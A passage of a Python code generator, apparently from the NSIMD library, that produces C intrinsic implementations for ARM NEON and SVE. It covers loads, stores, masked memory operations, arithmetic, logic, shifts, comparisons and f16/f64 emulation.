{ltyp} buf0[{le}], buf1[{le}];
vst1q_{lsuf}(buf0, {in0});
vst1q_{lsuf}(buf1, {in1});
for (i = 0; i < {le}; i++) {{
buf0[i] = buf0[i] {op} buf1[i] ? ({ltyp})-1 : 0;
}}
return vld1q_{lsuf}(buf0);'''. \
format(op=op, le=le, ltyp=ltyp, lsuf=lsuf, **fmtspec)
def emulate_op3_neon(op, simd_ext, typ):
le = 128 // int(typ[1:]);
return '''int i;
{typ} buf0[{le}], buf1[{le}], buf2[{le}];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
vst1q_{suf}(buf2, {in2});
for (i = 0; i < {le}; i += nsimd_len_cpu_{typ}()) {{
nsimd_storeu_cpu_{typ}(&buf0[i], nsimd_{op}_cpu_{typ}(
nsimd_loadu_cpu_{typ}(&buf0[i]),
nsimd_loadu_cpu_{typ}(&buf1[i]),
nsimd_loadu_cpu_{typ}(&buf2[i])));
}}
return vld1q_{suf}(buf0);'''.format(op=op, le=le, **fmtspec)
def emulate_f64_neon(simd_ext, op, params):
fmtspec2 = fmtspec.copy()
fmtspec2['op'] = op
fmtspec2['buf_ret_decl'] = 'nsimd_cpu_{}f64 buf_ret;'. \
format('v' if params[0] == 'v' else 'vl')
fmtspec2['buf_decl'] = '\n'.join(['nsimd_cpu_{}f64 buf{};'. \
format('v' if p[1] == 'v' else 'vl', p[0]) \
for p in common.enum(params[1:])])
fmtspec2['bufs'] = ','.join(['buf{}'.format(i) \
for i in range(0, len(params) - 1)])
fmtspec2['ret_decl'] = 'nsimd_{}_{}f64 ret;'. \
format(simd_ext, 'v' if params[0] == 'v' else 'vl')
buf_set = '\n'.join('''buf{i}.v0 = {ini}.v0;
buf{i}.v1 = {ini}.v1;'''. \
format(i=i, ini=fmtspec['in{}'.format(i)]) \
for i in range(0, len(params) - 1))
return '''{buf_ret_decl}
{buf_decl}
{ret_decl}
{buf_set}
buf_ret = nsimd_{op}_cpu_f64({bufs});
ret.v0 = buf_ret.v0;
ret.v1 = buf_ret.v1;
return ret;'''.format(buf_set=buf_set, **fmtspec2)
# -----------------------------------------------------------------------------
def f16f64(simd_ext, typ, op, armop, arity, forced_intrinsics = ''):
fmtspec2 = fmtspec.copy()
tmpl = ', '.join(['{{in{}}}.v{{{{i}}}}'.format(i).format(**fmtspec) \
for i in range(0, arity)])
fmtspec2['args1'] = tmpl.format(i='0')
fmtspec2['args2'] = tmpl.format(i='1')
fmtspec2['armop'] = armop
fmtspec2['op'] = op
if simd_ext in neon and typ == 'f16':
if forced_intrinsics != '':
fmtspec2['intrinsics'] = forced_intrinsics
else:
temp = ', '.join(['{{in{}}}'.format(i).format(**fmtspec) \
for i in range(0, arity)])
fmtspec2['intrinsics'] = 'return v{}q_f16({});'.format(armop, temp)
return '''#ifdef NSIMD_ARM_FP16
{intrinsics}
#else
nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_{op}_{simd_ext}_f32({args1});
ret.v1 = nsimd_{op}_{simd_ext}_f32({args2});
return ret;
#endif'''.format(**fmtspec2)
elif simd_ext == 'neon128' and typ == 'f64':
return emulate_f64_neon(simd_ext, op, ['v'] * (arity + 1))
return ''
# -----------------------------------------------------------------------------
# Lengths
def max_len(simd_ext, typ):
if simd_ext == 'sve':
return 2048 // int(typ[1:])
elif simd_ext in fixed_sized_sve:
return int(simd_ext[3:]) // int(typ[1:])
else:
return 128 // int(typ[1:])
def real_len(simd_ext, typ):
if simd_ext == 'sve':
return 'nsimd_len_sve_{typ}()'.format(**fmtspec)
else:
return max_len(simd_ext, typ)
# -----------------------------------------------------------------------------
# Loads of degree 1, 2, 3 and 4
def load1234(opts, simd_ext, typ, deg):
if simd_ext in neon:
if deg == 1:
normal = 'return vld{deg}q_{suf}({in0});'. \
format(deg=deg, **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
/* Note that we can do much better but is it useful? */
nsimd_{simd_ext}_vf16 ret;
f32 buf[4];
buf[0] = nsimd_u16_to_f32(*(u16*){in0});
buf[1] = nsimd_u16_to_f32(*((u16*){in0} + 1));
buf[2] = nsimd_u16_to_f32(*((u16*){in0} + 2));
buf[3] = nsimd_u16_to_f32(*((u16*){in0} + 3));
ret.v0 = vld1q_f32(buf);
buf[0] = nsimd_u16_to_f32(*((u16*){in0} + 4));
buf[1] = nsimd_u16_to_f32(*((u16*){in0} + 5));
buf[2] = nsimd_u16_to_f32(*((u16*){in0} + 6));
buf[3] = nsimd_u16_to_f32(*((u16*){in0} + 7));
ret.v1 = vld1q_f32(buf);
return ret;
#endif'''.format(normal=normal, **fmtspec)
elif typ == 'f64' and simd_ext == 'neon128':
return \
'''nsimd_neon128_vf64 ret;
ret.v0 = *{in0};
ret.v1 = *({in0} + 1);
return ret;'''.format(**fmtspec)
else:
return normal
else:
normal = \
'''nsimd_{simd_ext}_v{typ}x{deg} ret;
{soa_typ} buf = vld{deg}q_{suf}({in0});
{assignment}
return ret;'''. \
format(deg=deg, soa_typ=get_native_soa_typ(simd_ext, typ, deg),
assignment='\n'.join(['ret.v{i} = buf.val[{i}];'. \
format(i=i) for i in range(0, deg)]), **fmtspec)
if typ == 'f16':
assignment = \
'''vst1q_u16(buf, temp.val[{{i}}]);
ret.v{{i}} = nsimd_loadu_{simd_ext}_f16((f16 *)buf);'''. \
format(**fmtspec)
return \
'''{soa_typ} temp = vld{deg}q_u16((u16 *){in0});
u16 buf[8];
nsimd_{simd_ext}_vf16x{deg} ret;
{assignment}
return ret;'''. \
format(deg=deg, assignment='\n'.join([assignment. \
format(i=i) for i in range(0, deg)]),
soa_typ=get_native_soa_typ(simd_ext, 'u16', deg),
**fmtspec)
elif typ in 'f64' and simd_ext == 'neon128':
return \
'nsimd_neon128_vf64x{} ret;\n'.format(deg) + \
'\n'.join(['ret.v{i}.v0 = *({in0} + {i});'. \
format(i=i, **fmtspec) for i in range(0, deg)]) + \
'\n'.join(['ret.v{i}.v1 = *({in0} + {ipd});'. \
format(i=i, ipd=i + deg, **fmtspec) \
for i in range(0, deg)]) + \
'\nreturn ret;\n'
elif typ in ['i64', 'u64'] and simd_ext == 'neon128':
return \
'''nsimd_neon128_v{typ}x{deg} ret;
{typ} buf[2];'''.format(deg=deg, **fmtspec) + \
'\n'.join(['''buf[0] = *({in0} + {i});
buf[1] = *({in0} + {ipd});
ret.v{i} = vld1q_{suf}(buf);'''. \
format(i=i, ipd=i + deg, **fmtspec) \
for i in range(0, deg)]) + \
'\nreturn ret;\n'
else:
return normal
else:
if deg == 1:
return 'return svld{deg}_{suf}({svtrue}, {in0});'. \
format(deg=deg, **fmtspec)
else:
return \
'''nsimd_{simd_ext}_v{typ}x{deg} ret;
{sve_typ} buf = svld{deg}_{suf}({svtrue}, {in0});
{assignment}
return ret;'''.format(assignment=\
'\n'.join(['ret.v{i} = svget{deg}_{suf}(buf, {i});'. \
format(i=i, deg=deg, **fmtspec) \
for i in range(deg)]),
sve_typ=get_native_soa_typ('sve', typ, deg),
deg=deg, **fmtspec)
# -----------------------------------------------------------------------------
# Mask loads
def maskoz_load(oz, simd_ext, typ):
if simd_ext in sve:
return 'return svsel_{suf}({in0}, svld1_{suf}({in0}, {in1}), {oz});'. \
format(oz='{in2}'.format(**fmtspec) if oz == 'o' \
else 'svdup_n_{suf}(({typ})0)'.format(**fmtspec),
**fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vf64 ret;
if ({in0}.v0) {{
ret.v0 = {in1}[0];
}} else {{
ret.v0 = {oz0};
}}
if ({in0}.v1) {{
ret.v1 = {in1}[1];
}} else {{
ret.v1 = {oz1};
}}
return ret;'''.format(
oz0 = '0.0f' if oz == 'z' else '{in2}.v0'.format(**fmtspec),
oz1 = '0.0f' if oz == 'z' else '{in2}.v1'.format(**fmtspec),
**fmtspec)
le = 128 // int(typ[1:])
normal = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
vst1q_{suf}(buf, {oz});
vst1q_u{typnbits}(mask, {in0});
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
buf[i] = {in1}[i];
}}
}}
return vld1q_{suf}(buf);'''. \
format(oz='vdupq_n_{suf}(({typ})0)'.format(**fmtspec) \
if oz == 'z' else '{in2}'.format(**fmtspec),
le=le, **fmtspec)
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
int i;
nsimd_{simd_ext}_vf16 ret;
f32 buf[8];
u32 mask[8];
vst1q_f32(buf, {oz0});
vst1q_f32(buf + 4, {oz1});
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + 4, {in0}.v1);
for (i = 0; i < 8; i++) {{
if (mask[i]) {{
buf[i] = nsimd_f16_to_f32({in1}[i]);
}}
}}
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''. \
format(oz0='vdupq_n_f32(0.0f)'.format(**fmtspec) \
if oz == 'z' else '{in2}.v0'.format(**fmtspec),
oz1='vdupq_n_f32(0.0f)'.format(**fmtspec) \
if oz == 'z' else '{in2}.v1'.format(**fmtspec),
normal=normal, **fmtspec)
return normal
# -----------------------------------------------------------------------------
# Stores of degree 1, 2, 3 and 4
def store1234(opts, simd_ext, typ, deg):
if simd_ext in neon:
if deg == 1:
normal = 'vst{deg}q_{suf}({in0}, {in1});'. \
format(deg=deg, **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
f32 buf[4];
vst1q_f32(buf, {in1}.v0);
*((u16*){in0} ) = nsimd_f32_to_u16(buf[0]);
*((u16*){in0} + 1) = nsimd_f32_to_u16(buf[1]);
*((u16*){in0} + 2) = nsimd_f32_to_u16(buf[2]);
*((u16*){in0} + 3) = nsimd_f32_to_u16(buf[3]);
vst1q_f32(buf, {in1}.v1);
*((u16*){in0} + 4) = nsimd_f32_to_u16(buf[0]);
*((u16*){in0} + 5) = nsimd_f32_to_u16(buf[1]);
*((u16*){in0} + 6) = nsimd_f32_to_u16(buf[2]);
*((u16*){in0} + 7) = nsimd_f32_to_u16(buf[3]);
#endif'''.format(normal=normal, **fmtspec)
elif typ == 'f64' and simd_ext == 'neon128':
return \
'''*{in0} = {in1}.v0;
*({in0} + 1) = {in1}.v1;'''.format(**fmtspec)
else:
return normal
else:
normal = \
'''{soa_typ} buf;
{assignment}
vst{deg}q_{suf}({in0}, buf);'''. \
format(deg=deg, assignment='\n'.join([
'buf.val[{{}}] = {{in{}}};'.format(i). \
format(i - 1, **fmtspec) for i in range(1, deg + 1)]),
soa_typ=get_native_soa_typ(simd_ext, typ, deg),
**fmtspec)
if typ == 'f16':
assignment = \
'''nsimd_storeu_{{simd_ext}}_f16((f16 *)buf, {{in{}}});
temp.val[{{}}] = vld1q_u16(buf);'''
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
{soa_typ} temp;
u16 buf[8];
{assignment}
vst{deg}q_u16((u16 *){in0}, temp);
#endif'''. \
format(assignment='\n'.join([assignment.format(i). \
format(i - 1, **fmtspec) \
for i in range(1, deg + 1)]),
deg=deg, normal=normal,
soa_typ=get_native_soa_typ(simd_ext, 'u16', deg),
**fmtspec)
elif typ == 'f64' and simd_ext == 'neon128':
return \
'\n'.join(['*({{in0}} + {}) = {{in{}}}.v0;'. \
format(i - 1, i).format(**fmtspec) \
for i in range(1, deg + 1)]) + '\n' + \
'\n'.join(['*({{in0}} + {}) = {{in{}}}.v1;'. \
format(i + deg - 1, i).format(**fmtspec) \
for i in range(1, deg + 1)])
elif typ in ['i64', 'u64'] and simd_ext == 'neon128':
return \
'{typ} buf[{biglen}];'.format(biglen=2 * deg, **fmtspec) + \
'\n'.join(['vst1q_{{suf}}(buf + {im1x2}, {{in{i}}});'. \
format(im1x2=2 * (i - 1), i=i).format(**fmtspec) \
for i in range(1, deg + 1)]) + \
'\n'.join(['''*({in0} + {i}) = buf[{ix2}];
*({in0} + {ipd}) = buf[{ix2p1}];'''. \
format(i=i, ipd=i + deg, ix2=i * 2,
ix2p1=2 * i + 1, **fmtspec) \
for i in range(0, deg)])
else:
return normal
else:
if deg == 1:
return 'svst{deg}_{suf}({svtrue}, {in0}, {in1});'. \
format(deg=deg, **fmtspec)
fill_soa_typ = \
'\n'.join(['tmp = svset{{deg}}_{{suf}}(tmp, {im1}, {{in{i}}});'. \
format(im1=i - 1, i=i).format(deg=deg, **fmtspec) \
for i in range(1, deg + 1)])
return \
'''{soa_typ} tmp = svundef{deg}_{suf}();
{fill_soa_typ}
svst{deg}_{suf}({svtrue}, {in0}, tmp);'''. \
format(soa_typ=get_native_soa_typ('sve', typ, deg), deg=deg,
fill_soa_typ=fill_soa_typ, **fmtspec)
# -----------------------------------------------------------------------------
# Mask stores
def mask_store(simd_ext, typ):
if simd_ext in sve:
return 'svst1_{suf}({in0}, {in1}, {in2});'.format(**fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''if ({in0}.v0) {{
{in1}[0] = {in2}.v0;
}}
if ({in0}.v1) {{
{in1}[1] = {in2}.v1;
}}'''.format(**fmtspec)
le = 128 // int(typ[1:])
normal = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
vst1q_{suf}(buf, {in2});
vst1q_u{typnbits}(mask, {in0});
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
{in1}[i] = buf[i];
}}
}}'''.format(le=le, **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
f32 buf[8];
u32 mask[8];
int i;
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + 4, {in0}.v1);
vst1q_f32(buf, {in2}.v0);
vst1q_f32(buf + 4, {in2}.v1);
for (i = 0; i < 8; i++) {{
if (mask[i]) {{
{in1}[i] = nsimd_f32_to_f16(buf[i]);
}}
}}
#endif'''.format(normal=normal, **fmtspec)
return normal
# -----------------------------------------------------------------------------
# Length
def len1(simd_ext, typ):
if simd_ext in neon:
return 'return {};'.format(128 // int(typ[1:]))
elif simd_ext == 'sve':
return 'return (int)svcntp_b{typnbits}({svtrue}, {svtrue});'. \
format(**fmtspec)
elif simd_ext in fixed_sized_sve:
return 'return {};'.format(int(simd_ext[3:]) // int(typ[1:]))
# -----------------------------------------------------------------------------
# Add/sub
def addsub(op, simd_ext, typ):
ret = f16f64(simd_ext, typ, op, op, 2)
if ret != '':
return ret
if simd_ext in neon:
return 'return v{op}q_{suf}({in0}, {in1});'. \
format(op=op, **fmtspec)
else:
return 'return sv{op}_{suf}_x({svtrue}, {in0}, {in1});'. \
format(op=op, **fmtspec)
# -----------------------------------------------------------------------------
# Multiplication
def mul2(simd_ext, typ):
ret = f16f64(simd_ext, typ, 'mul', 'mul', 2)
if ret != '':
return ret
elif simd_ext in neon and typ in ['i64', 'u64']:
return emulate_op2('*', simd_ext, typ)
else:
if simd_ext in neon:
return 'return vmulq_{suf}({in0}, {in1});'.format(**fmtspec)
else:
return 'return svmul_{suf}_x({svtrue}, {in0}, {in1});'. \
format(**fmtspec)
# -----------------------------------------------------------------------------
# Division
def div2(simd_ext, typ):
if simd_ext == 'aarch64' and typ in ['f32', 'f64']:
return 'return vdivq_{suf}({in0}, {in1});'.format(**fmtspec)
elif simd_ext in sve and \
typ in ['f16', 'f32', 'f64', 'i32', 'u32', 'i64', 'u64']:
return 'return svdiv_{suf}_x({svtrue}, {in0}, {in1});'. \
format(**fmtspec)
else:
ret = f16f64(simd_ext, typ, 'div', 'div', 2)
if ret != '':
return ret
return emulate_op2('/', simd_ext, typ)
# -----------------------------------------------------------------------------
# Binary operators: and, or, xor, andnot
def binop2(op, simd_ext, typ):
armop = {'orb': 'orr', 'xorb': 'eor', 'andb': 'and', 'andnotb': 'bic'}
if typ in common.iutypes:
if simd_ext in neon:
return 'return v{armop}q_{suf}({in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
else:
return 'return sv{armop}_{suf}_x({svtrue}, {in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
# From here only float types
if typ == 'f16':
intrinsics = \
'''return vreinterpretq_f16_u16(v{armop}q_u16(vreinterpretq_u16_f16(
{in0}), vreinterpretq_u16_f16({in1})));'''. \
format(armop=armop[op], **fmtspec)
else:
intrinsics = ''
ret = f16f64(simd_ext, typ, op, armop[op], 2, intrinsics)
if ret != '':
return ret
if simd_ext in neon:
return \
'''return vreinterpretq_f{typnbits}_u{typnbits}(v{armop}q_u{typnbits}(
vreinterpretq_u{typnbits}_f{typnbits}({in0}),
vreinterpretq_u{typnbits}_f{typnbits}({in1})));'''. \
format(armop=armop[op], **fmtspec)
else:
return \
'''return svreinterpret_f{typnbits}_u{typnbits}(
sv{armop}_u{typnbits}_x({svtrue},
svreinterpret_u{typnbits}_f{typnbits}({in0}),
svreinterpret_u{typnbits}_f{typnbits}({in1})));'''. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Binary not
def not1(simd_ext, typ):
if typ in common.iutypes:
if simd_ext in neon:
if typ in ['i8', 'u8', 'i16', 'u16', 'i32', 'u32']:
return 'return vmvnq_{suf}({in0});'.format(**fmtspec)
else:
return \
'''return vreinterpretq_{suf}_u32(vmvnq_u32(
vreinterpretq_u32_{suf}({in0})));'''. \
format(**fmtspec)
if simd_ext in sve:
return 'return svnot_{suf}_x({svtrue}, {in0});'.format(**fmtspec)
# From here only float types
if typ == 'f16':
intrinsics = \
'''return vreinterpretq_f16_u16(vmvnq_u16(vreinterpretq_u16_f16(
{in0})));'''.format(**fmtspec)
else:
intrinsics = ''
ret = f16f64(simd_ext, typ, 'notb', 'mvn', 1, intrinsics)
if ret != '':
return ret
if simd_ext in neon:
return \
'''return vreinterpretq_{suf}_u32(vmvnq_u32(
vreinterpretq_u32_{suf}({in0})));'''. \
format(**fmtspec)
else:
return \
'''return svreinterpret_{suf}_u{typnbits}(svnot_u{typnbits}_x(
{svtrue}, svreinterpret_u{typnbits}_{suf}({in0})));'''. \
format(**fmtspec)
# -----------------------------------------------------------------------------
# Logical operators: and, or, xor, andnot
def lop2(opts, op, simd_ext, typ):
armop = {'orl': 'orr', 'xorl': 'eor', 'andl': 'and', 'andnotl': 'bic'}
if simd_ext in neon:
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
return v{armop}q_u16({in0}, {in1});
#else
nsimd_{simd_ext}_vlf16 ret;
ret.v0 = v{armop}q_u32({in0}.v0, {in1}.v0);
ret.v1 = v{armop}q_u32({in0}.v1, {in1}.v1);
return ret;
#endif'''.format(armop=armop[op], **fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
if op == 'andnotl':
return '''nsimd_{simd_ext}_vlf64 ret;
ret.v0 = {in0}.v0 & (~{in1}.v0);
ret.v1 = {in0}.v1 & (~{in1}.v1);
return ret;'''.format(**fmtspec)
else:
cpuop = {'orl': '|', 'xorl': '^', 'andl': '&'}
return '''nsimd_{simd_ext}_vlf64 ret;
ret.v0 = {in0}.v0 {cpuop} {in1}.v0;
ret.v1 = {in0}.v1 {cpuop} {in1}.v1;
return ret;'''.format(cpuop=cpuop[op], **fmtspec)
else:
return 'return v{armop}q_u{typnbits}({in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
else:
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return \
'''return sv{armop}_x({svtrue},
(svuint{typnbits}_t){in0},
(svuint{typnbits}_t){in1});'''. \
format(armop=armop[op], **fmtspec)
else:
return '''return sv{armop}_z({svtrue}, {in0}, {in1});'''. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Logical not
def lnot1(opts, simd_ext, typ):
if simd_ext in neon:
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
return vmvnq_u16({in0});
#else
nsimd_{simd_ext}_vlf16 ret;
ret.v0 = vmvnq_u32({in0}.v0);
ret.v1 = vmvnq_u32({in0}.v1);
return ret;
#endif'''.format(**fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vlf64 ret;
ret.v0 = ~{in0}.v0;
ret.v1 = ~{in0}.v1;
return ret;'''.format(**fmtspec)
elif typ in ['i64', 'u64', 'f64']:
return '''return vreinterpretq_u{typnbits}_u32(vmvnq_u32(
vreinterpretq_u32_u{typnbits}({in0})));'''. \
format(**fmtspec)
else:
return 'return vmvnq_u{typnbits}({in0});'.format(**fmtspec)
elif simd_ext in sve:
if opts.sve_emulate_bool:
# TODO: the cast is a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return 'return svnot_x({svtrue}, (svuint{typnbits}_t){in0});'.format(**fmtspec)
else:
return 'return svnot_z({svtrue}, {in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Square root
def sqrt1(simd_ext, typ):
if simd_ext == 'neon128':
if typ in 'f16':
return '''nsimd_neon128_vf16 ret;
ret.v0 = nsimd_sqrt_neon128_f32({in0}.v0);
ret.v1 = nsimd_sqrt_neon128_f32({in0}.v1);
return ret;'''.format(**fmtspec)
elif typ == 'f64':
return f16f64('neon128', 'f64', 'sqrt', 'sqrt', 1)
else:
return emulate_op1('sqrt', simd_ext, typ)
elif simd_ext == 'aarch64':
if typ == 'f16':
return f16f64('aarch64', 'f16', 'sqrt', 'sqrt', 1)
else:
return 'return vsqrtq_{suf}({in0});'.format(**fmtspec)
else:
return 'return svsqrt_{suf}_x({svtrue}, {in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Shifts
def shl_shr(op, simd_ext, typ):
if simd_ext in neon:
sign = '-' if op == 'shr' else ''
if typ in common.utypes:
return '''return vshlq_{suf}({in0}, vdupq_n_s{typnbits}(
(i{typnbits})({sign}{in1})));'''. \
format(sign=sign, **fmtspec)
else:
return \
'''return vreinterpretq_s{typnbits}_u{typnbits}(vshlq_u{typnbits}(
vreinterpretq_u{typnbits}_s{typnbits}({in0}),
vdupq_n_s{typnbits}((i{typnbits})({sign}{in1}))));'''. \
format(sign=sign, **fmtspec)
else:
armop = 'lsl' if op == 'shl' else 'lsr'
if op == 'shr' and typ in common.itypes:
return \
'''return svreinterpret_{suf}_{suf2}(sv{armop}_{suf2}_x({svtrue},
svreinterpret_{suf2}_{suf}({in0}),
svdup_n_u{typnbits}((u{typnbits}){in1})));'''. \
format(suf2=common.bitfield_type[typ], armop=armop,
**fmtspec)
else:
return '''return sv{armop}_{suf}_x({svtrue}, {in0},
svdup_n_u{typnbits}((u{typnbits}){in1}));'''. \
format(armop=armop, **fmtspec)
def shra(simd_ext, typ):
if typ in common.utypes:
return '''return nsimd_shr_{simd_ext}_{typ}({in0}, {in1});'''. \
format(**fmtspec)
if simd_ext in neon:
return '''return vshlq_{suf}(
{in0}, vdupq_n_s{typnbits}((i{typnbits})-{in1}));'''.\
format(**fmtspec)
elif simd_ext in sve:
if typ[0] == 'i':
return '''return svasr_n_{suf}_x({svtrue}, {in0},
(u{typnbits}){in1});'''.\
format(**fmtspec)
elif typ[0] == 'u':
return 'return svlsl_n_{suf}_x({svtrue}, {in0}, (u64){in1});'.\
format(**fmtspec)
# -----------------------------------------------------------------------------
# Set1
def set1(simd_ext, typ):
if simd_ext in neon:
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vdupq_n_f16({in0});
#else
nsimd_{simd_ext}_vf16 ret;
f32 f = nsimd_f16_to_f32({in0});
ret.v0 = nsimd_set1_{simd_ext}_f32(f);
ret.v1 = nsimd_set1_{simd_ext}_f32(f);
return ret;
#endif'''.format(**fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0};
ret.v1 = {in0};
return ret;'''.format(**fmtspec)
else:
return 'return vdupq_n_{suf}({in0});'.format(**fmtspec)
else:
return 'return svdup_n_{suf}({in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Set1l
def lset1(simd_ext, typ):
if simd_ext in sve:
return '''if ({in0}) {{
return svptrue_b{typnbits}();
}} else {{
return svpfalse_b();
}}'''.format(**fmtspec)
    # getting here means neon128 or aarch64 only
mask = 'vdupq_n_u{typnbits}((u{typnbits}){{}})'.format(**fmtspec)
normal = '''if ({in0}) {{
return {ones};
}} else {{
return {zeros};
}}'''.format(ones=mask.format('-1'), zeros=mask.format('0'),
**fmtspec)
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
nsimd_{simd_ext}_vlf16 ret;
ret.v0 = nsimd_set1l_{simd_ext}_f32({in0});
ret.v1 = ret.v0;
return ret;
#endif'''.format(normal=normal, **fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vlf64 ret;
ret.v0 = (u64)({in0} ? -1 : 0);
ret.v1 = ret.v0;
return ret;'''.format(**fmtspec)
return normal
# -----------------------------------------------------------------------------
# Comparison operators: ==, <, <=, >, >=
def cmp2(opts, op, simd_ext, typ):
binop = {'eq': '==', 'lt': '<', 'le': '<=', 'gt': '>', 'ge': '>='}
armop = {'eq': 'eq', 'lt': 'lt', 'le': 'le', 'gt': 'gt', 'ge': 'ge'}
if simd_ext in neon:
emul_f16 = '''nsimd_{simd_ext}_vlf16 ret;
ret.v0 = nsimd_{op}_{simd_ext}_f32({in0}.v0, {in1}.v0);
ret.v1 = nsimd_{op}_{simd_ext}_f32({in0}.v1, {in1}.v1);
return ret;'''.format(op=op, **fmtspec)
normal = 'return vc{armop}q_{suf}({in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
if typ == 'f16':
if simd_ext == 'neon128':
return emul_f16
else:
return \
'''#ifdef NSIMD_ARM_FP16
{}
#else
{}
#endif'''.format(normal, emul_f16)
if simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_{simd_ext}_vl{typ} ret;
ret.v0 = {in0}.v0 {op} {in1}.v0 ? (u64)-1 : 0;
ret.v1 = {in0}.v1 {op} {in1}.v1 ? (u64)-1 : 0;
return ret;'''.format(op=binop[op], **fmtspec)
elif simd_ext == 'neon128' and typ in ['i64', 'u64']:
return '''{typ} buf0[2], buf1[2];
u64 ret[2];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
ret[0] = buf0[0] {op} buf1[0] ? (u64)-1 : 0;
ret[1] = buf0[1] {op} buf1[1] ? (u64)-1 : 0;
return vld1q_u64(ret);'''. \
format(op=binop[op], **fmtspec)
else:
return normal
elif simd_ext in sve:
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
comp = 'svcmp{op}_{suf}({svtrue}, ({svetyp}){in0}, ({svetyp}){in1})'. \
format(op=armop[op], **fmtspec)
return 'return {};'.format(convert_from_predicate(opts, comp))
else:
return 'return svcmp{op}_{suf}({svtrue}, {in0}, {in1});'. \
format(op=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Not equal
def neq2(opts, simd_ext, typ):
if simd_ext in neon:
return '''return nsimd_notl_{simd_ext}_{typ}(
nsimd_eq_{simd_ext}_{typ}({in0}, {in1}));'''. \
format(**fmtspec)
elif simd_ext in sve:
comp='svcmpne_{suf}({svtrue}, {in0}, {in1})'. \
format(**fmtspec)
return 'return {};'.format(convert_from_predicate(opts, comp))
# -----------------------------------------------------------------------------
# If_else
def if_else3(opts, simd_ext, typ):
if simd_ext in neon:
intrinsic = 'return vbslq_{suf}({in0}, {in1}, {in2});'. \
format(**fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{intrinsic}
#else
nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_if_else1_{simd_ext}_f32(
{in0}.v0, {in1}.v0, {in2}.v0);
ret.v1 = nsimd_if_else1_{simd_ext}_f32(
{in0}.v1, {in1}.v1, {in2}.v1);
return ret;
#endif'''.format(intrinsic=intrinsic, **fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0}.v0 != 0u ? {in1}.v0 : {in2}.v0;
ret.v1 = {in0}.v1 != 0u ? {in1}.v1 : {in2}.v1;
return ret;'''.format(**fmtspec)
else:
return intrinsic
elif simd_ext in sve:
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return 'return svsel_{suf}({cond}, ({svetyp}){in1}, ({svetyp}){in2});' \
.format(cond=convert_to_predicate(opts,
'{in0}'.format(**fmtspec)),
**fmtspec)
else:
return 'return svsel_{suf}({in0}, {in1}, {in2});' \
.format(**fmtspec)
# -----------------------------------------------------------------------------
# Minimum and maximum
def minmax2(op, simd_ext, typ):
ret = f16f64(simd_ext, typ, op, op, 2)
if ret != '':
return ret
if simd_ext in neon:
if typ in ['i64', 'u64']:
binop = '<' if op == 'min' else '>'
return '''{typ} buf0[2], buf1[2];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
buf0[0] = buf0[0] {binop} buf1[0] ? buf0[0] : buf1[0];
buf0[1] = buf0[1] {binop} buf1[1] ? buf0[1] : buf1[1];
return vld1q_{suf}(buf0);'''. \
format(binop=binop, **fmtspec)
else:
return 'return v{op}q_{suf}({in0}, {in1});'. \
format(op=op, **fmtspec)
else:
return 'return sv{op}_{suf}_x({svtrue}, {in0}, {in1});'. \
format(op=op, **fmtspec)
# -----------------------------------------------------------------------------
# Abs
def abs1(simd_ext, typ):
if typ in common.utypes:
return 'return {in0};'.format(**fmtspec)
elif simd_ext in neon:
if typ == 'f16':
return f16f64(simd_ext, 'f16', 'abs', 'abs', 1)
elif (typ in ['i8', 'i16', 'i32', 'f32']) or \
(simd_ext == 'aarch64' and typ in ['i64', 'f64']):
return 'return vabsq_{suf}({in0});'.format(**fmtspec)
